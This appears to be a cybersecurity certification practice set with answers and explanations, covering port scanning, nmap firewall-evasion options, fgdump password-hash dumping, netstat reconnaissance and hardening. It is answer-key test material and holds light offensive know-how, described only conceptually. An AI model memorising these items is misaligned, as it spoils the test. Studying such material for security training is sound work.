While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. What service can he typically expect to run on this port? A.Oracle B.VNC C.IRC D.Microsoft SQL

D.Microsoft SQL Explanation: Microsoft SQL typically runs on TCP ports 1433 and 1434. Oracle's default is 1521, IRC is 6667, and VNC is 5900.

When Casey scanned a network host, she received the results shown here. What does she know based on the scan results? A.The device is a Cisco device B.The device is running CentOS C.The device was built by IBM D.None of the above

D.None of the above Explanation: Casey knows that she saw three open ports and that nmap took its best guess at what was running on those ports. In this case, the system is actually a Kali Linux system, a Debian distribution. This is not a Cisco device, it is not running CentOS, and it was not built by IBM.

After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the test used the -O flag. What type of information should she expect to see included in the output other than the open ports? A.OCMP status B.Other ports C.Objective port assessment data in verbose mode D.Operating system and Common Platform Enumeration (CPE) data

D.Operating system and Common Platform Enumeration (CPE) data Explanation: nmap provides Common Platform Enumeration data when the -O (OS fingerprinting) and verbose flags are used. If Kristen had seen the -sV flag instead, she would have expected service version information.

Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems? A.Enable host firewalls B.Install patches for those services C.Turn off the services for each appliance D.Place a network firewall between the devices and the rest of the network

D.Place a network firewall between the devices and the rest of the network Explanation: Geoff's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don't have patches available, and many appliances do not allow the services they provide to be disabled or modified.

Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization's Windows domain administrator. What information should she not report as being potentially exposed? A.All files on the user's desktop B.Password hashes C.Domain details D.Plain-text Windows account passwords

D.Plain-text Windows account passwords Explanation: Cassandra should report that password hashes, user files, and domain details may have been exposed. Windows does not store plain-text Windows account passwords, so this should not be a concern unless the administrator keeps them in a file.

Stacey encountered a system that shows as "filtered" and "firewalld" during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan? A.Packet fragmentation B.Spoofing the source address C.Use decoy scans D.Spoofing the destination address

D.Spoofing the destination address Explanation: nmap has a number of built-in anti-firewall capabilities, including packet fragmentation, decoy scans, spoofing of source IP and source port, and scan timing techniques that make detection less likely. Spoofing the target IP address won't help; her packets still need to get to the actual target.

How can Saria remediate the issue shown here in the MBSA screenshot? A.Force all users to set a complex password B.Set a minimum password age C.Enforce password expiration D.This is not a problem

D.This is not a problem Explanation: The accounts shown are disabled, and disabled accounts with a weak password are typically not a problem. If they are an issue, Saria's best option would be to delete the accounts unless they are required for a specific purpose.

Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports? A.Botnet C&C B.Nginx C.Microsoft SQL Server instances D.Web servers

D.Web servers Explanation: Many system administrators have historically chosen 8080 and 8443 as the alternate service ports for plain-text and secure web services. While these ports could be used for any service, it would be reasonable for Cynthia to guess that a pair of services on ports like these belong to web servers.

Adam needs to provide ssh access to systems behind his data center firewall. If Adam's organization uses the system architecture shown here, what is the system at point A called? A.a firewall-hopper B.an isolated system C.a moat-protected host D.a jump box

D.a jump box Explanation: Adam is using a jump box to provide access. A jump box, sometimes called a jump server or secure administrative host, is a system used to manage devices in a separate, typically higher security zone. This prevents administrators from using a less secure administrative workstation in the high security zone.

What command can Amanda use to terminate the process? A.term B.stop C.end D.kill

D.kill Explanation: The kill command is used to end processes in Linux. Amanda should issue the kill -9 command followed by the process ID of the processes she wants to end (the -9 flag is the signal and means "really try hard to kill this process"). Since she has run both top and htop, she knows that she needs to end processes 3843 and 3820 to stop stress from consuming all of her resources. A little research after that will show her that stress is a stress testing application, so she may want to ask the user who ran it why they were using it if it wasn't part of their job!

During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate the database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic? A.ping B.tracert C.nmap D.netstat

D.netstat Explanation: netstat is found on Windows, Linux, and macOS systems and can provide information about open ports and about other systems that the host has connected to. Chris can search for common web and database server service ports to help identify the local targets he is looking for.

Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing? A.svcctl -l B.service list C.service -l D.sc query

D.sc query Explanation: The Windows Service Controller, sc, provides command-line control of services. Commands include start, stop, pause, query, and other service-related commands. Using sc query provides a list of services with their display name, type, state, exit codes, checkpoint, and wait hint codes. Geoff can use output like this to check for unexpected services running on the system if he has local command-line access for only a limited period of time.

Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? A.grep B.more C.less D.strings

D.strings Explanation: The strings command extracts strings of printable characters from files, allowing Ben to quickly determine the contents of files. Incorrect answers: grep would require knowing what he is looking for, and either the more or less command will simply display the file, which is often not a useful strategy for binaries.

Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system. What type of information has the penetration tester targeted? A.File and group information B.Passwords and usernames C.Active Directory full GPO lists D.Nothing, because FGDump is a Linux tool

B.Passwords and usernames Explanation: FGDump is a tool used for Windows password auditing. If successful, it will dump the username and password hash for every user.

As a US government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as? A.Gray market procurement B.Trusted Foundry C.White market procurement D.Chain of procurement

B.Trusted Foundry Explanation: The US DoD Trusted Foundry program works to assure the integrity and confidentiality of integrated circuit design and manufacturing. This helps to ensure that agents of foreign governments are not able to insert flaws or code into the ICs that could be leveraged for intelligence or cyberwarfare activities.
